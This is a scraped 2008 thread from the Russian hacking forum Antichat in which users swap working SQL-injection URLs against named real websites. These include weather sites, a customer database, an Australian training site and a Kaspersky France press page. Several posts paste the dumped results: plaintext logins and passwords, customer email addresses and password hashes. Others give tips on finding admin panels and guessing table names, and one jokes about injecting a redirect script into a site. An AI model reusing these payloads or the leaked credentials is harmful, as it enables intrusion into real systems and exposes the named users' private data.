Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
24.07.2008, 00:49
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Зы: Можно шуткануть - вставить в новость lo cation.href куда нить на anus.com =)
|
|
|
24.07.2008, 03:50
|
|
Постоянный
Регистрация: 06.05.2007
Сообщений: 393
Провел на форуме:
1510937
Репутация:
398
|
|
Код:
http://www.neilprydemaui.com/items.php?id=-48+union+select+1,2,concat_ws(0xEF,version()),4,5,6,7,8,9,10,11/*
|
|
|
|
24.07.2008, 08:46
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
color-style.ru
Код:
http://www.color-style.ru/catalogue.php?sect_id=3+and+substring(version(),1,1)=5/*
Database Version: 5.0.45-log
Database name: u91786
User name: u91786@10.10.153.164
таблица CUSTOMERS
login:passwd:email
[1]:admin:admin:
[2]:garry:qazzaq:garry@lit.botik.ru
[3]:ivan:ivan:ivan@ivan.com
[4]:nata:1:
[5]:anjelika:anjelika:
[6]:viktor:viktor:kva@mail.cbr.ru
...................................................
..................................................
[77]:alisa:alisa:
[78]:alisak:alisak:vitalsson@rambler.ru
[79]:Olga:030393:Smolyaninova_m@mail.ru
[80]:Arinako:Cfytxtr:Arinako@gmail.com
Ксожелению юзер пасс к админке в бд не храняться
(
|
|
|
|
24.07.2008, 11:44
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
В добовление к вчерашним Метео сайтам.
Не навиду Метео прогнозы вечно врут гады....
http://www.meteo-tv.ru
(Пожалуй самая популярная программа о погоде. Почти по всем каналам крутят)
http://www.meteo-tv.ru/news/item.php?newsID=-6869+union+select+1,2,concat(login,char(58),passwo rd),4,5,6,7+from+users+limit+1,1/*
admin:40bd001563085fc35165329ea1ff5c5ecbdbbeef
(Ну и форум туда же  )
http://www.meteo-tv.ru/news/item.php?newsID=-6869+union+select+1,2,concat(username,char(58),use r_password),4,5,6,7+from+forum_users+limit+1,1/*
viking:a37c3645bb4a1ea0f112ad60b8e6a581
--------------------------------------------------------------------------------------------------------------
http://pogoda.ru.net/
(Тут появились некоторые сложности скуля есть, а вот с выводом проблемы нужны подзапросы если правельно мыслю....)
http://pogoda.ru.net/records.php?d=7'+union+select+1,2,3,4,5,6,7,8,9,10 ,11/*
--------------------------------------------------------------------------------------------------------------
http://www.meteo-gid.ru
(Еще один идиотский проэкт http://www.meteo-tv.ru)
С таблицами не стал мучиться если кому будет интересно думаю найдете =)
http://www.meteo-gid.ru/index.php?pageId=3&newsId=382+union+select+1,2,con cat(table_name,char(58),column_name,char(58),table _schema),4,5,6,7,8+from+information_schema.columns +limit+1,1/* |
|
|
|
24.07.2008, 13:43
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
www.agrifoodskills.net.au
user() = agrione@localhost
version() = 4.0.20a-nt
database() = agrirev
http://www.agrifoodskills.net.au/display_announce.php?id=44444444444441/**/union/**/select/**/concat_ws(0x3a,username,password)/**/from/**/users/**/limit/**/0,1/*
count from users = 139
ricktu:e1da02cc31d9a7ffaaf9d759cfe2c8fc
jane:b9a51726733fd31e3b4cd7dfb272f7fa
Justin Lazic:18cdeae7b347cc1518f4537476032435
justin:e10adc3949ba59abbe56e057f20f883e
kateb:2b10435032f537ce08893c0962878796
wendyskelton:e5e7105d5c05d9c0cc5944ff1341b533
...
...
админка = http://www.agrifoodskills.net.au/admin.php
но пароли не подходят :)
там еще и форум есть
|
|
|
|
24.07.2008, 16:17
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://presse.kaspersky.fr/presse.php?type=&article=&bibid=9999999999+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,name,password),9,10,11,version(),13,14,15,16++from+agora.agora_users/*
Mysql: 5.0.38-Dotdeb_1.dotdeb.0-log
User/password : support/9dd3ba637ec2fcaf383415617d39e002 |
|
|
|
24.07.2008, 19:11
|
|
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750
Репутация:
277
|
|
Код:
http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,USER(),3,4,5,6,7/*
user: renewabl_webuser
имя БД: renewabl_mhpwebsite
но чтоб узнать пасс, надо знать таблу, для этого либо брутить, либбо информационная схема (не робит, ибо старый мускул), либо вручную угадать простые названия)) |
|
|
|
24.07.2008, 19:32
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Зачем брутить?
http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,2,Username,password,5,6,7+from+us ers/*
Бери аккаунт, администраторский или нет - хз. не проверял. Сейчас займусь.
Аккаунт не администраторский.
директория /admin/ защищена.
Значит, есть аналог admin.php либо adm.php(я проверял. 404)
Последний раз редактировалось Ershik; 24.07.2008 в 19:35..
|
|
|
|
24.07.2008, 19:35
|
|
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750
Репутация:
277
|
|
Ershik,cкули начал только изучать))
Результаты скинь=)
|
|
|
|
24.07.2008, 19:42
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Вот же ссылка
http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,2,Username,password,5,6,7+from+us ers/*
kubu : freedom
Или
http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,2,Username,password,5,6,7+from+us ers+limit+1,1/* и пр.
Пытайся сначала работать по стандартным таблицам.
user, users, admin, admins, и пр.
Если 4 ветка Mysql не факт, что безрезультатно .
Практикуйся |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.gif){kind=avatar}
Похожие темы
Линейный вид
